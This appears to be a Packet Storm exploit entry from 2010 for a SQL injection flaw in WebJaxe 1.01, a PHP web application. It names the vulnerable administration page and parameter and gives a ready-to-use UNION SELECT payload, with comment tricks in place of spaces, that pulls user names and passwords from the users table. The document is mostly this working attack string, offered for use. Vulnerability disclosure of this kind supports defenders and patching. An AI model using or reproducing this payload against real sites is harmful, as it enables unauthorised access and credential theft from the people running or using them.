WebJaxe 1.01 SQL Injection

2010-05-19T00:00:00
ID PACKETSTORM:89666
Type packetstorm
Reporter IHTeam
Modified 2010-05-19T00:00:00

Description

                                        
                                            `  
  
###############################################################################  
#  
# Exploit Title: WebJaxe Sql Injection  
# Date: 14-05-2010  
# Author: IHTeam  
# Software Link: http://media4.obspm.fr/outils/webjaxe/en/  
# Version: 1.01  
# Tested on: Win/Linux  
#  
###############################################################################  
  
!You need a registred user!  
  
http://[site]/[path]/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=[SQL]  
  
Example (Show username:password):  
http://localhost/webjaxe/php/partie_administrateur/administration.php?page=projet_contribution&id_contribution=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(prenom,char(58),motdepasse),3,4,5,6/**/FROM/**/utilisateurs  
  
  
`